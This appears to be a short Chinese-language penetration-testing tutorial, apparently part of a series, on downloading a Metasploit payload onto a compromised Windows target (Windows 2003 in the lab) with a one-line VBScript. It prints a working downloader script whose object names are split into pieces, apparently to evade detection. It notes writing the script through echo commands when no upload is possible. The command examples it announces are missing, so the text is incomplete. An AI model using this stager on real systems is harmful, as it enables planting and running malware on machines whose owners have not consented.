Vbs 一句话下载 Payload
作者:Micropoor
链接:https://micropoor.blogspot.com
一次msf完整的流程离不开目标机的payload下载与执行。而针对不同环境目标,考虑或者选择不同方式的payload下载与执行。如webshell下,注入点下。smb下等。而针对不同的实际环境,来做最好的选择。
既然本季开始专门针对windows下的payload下载讲解,那么就需要考虑到目标机的系统版本,是windows2000,windows 2003,或者是更高的版本如windows 2016等。无论是哪个版本的windows系列,都是支持vbs的。
靶机:windows 2003
vbs:保存
downfile.vbs
seta=createobject("adod"+"b.stream"):setw=createobject("micro"+"soft.xmlhttp"):w.open"get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile
wsh.arguments(1),2
命令行下执行:
往往在实战中,没有上传的方便条件,尤其是目标机是windows,只有echo方式来写入vbs。
命令行下执行:
优点:支持windows全版本
系列缺点:对https不友好
官方
3.18K篇文章
194.31M总阅读量
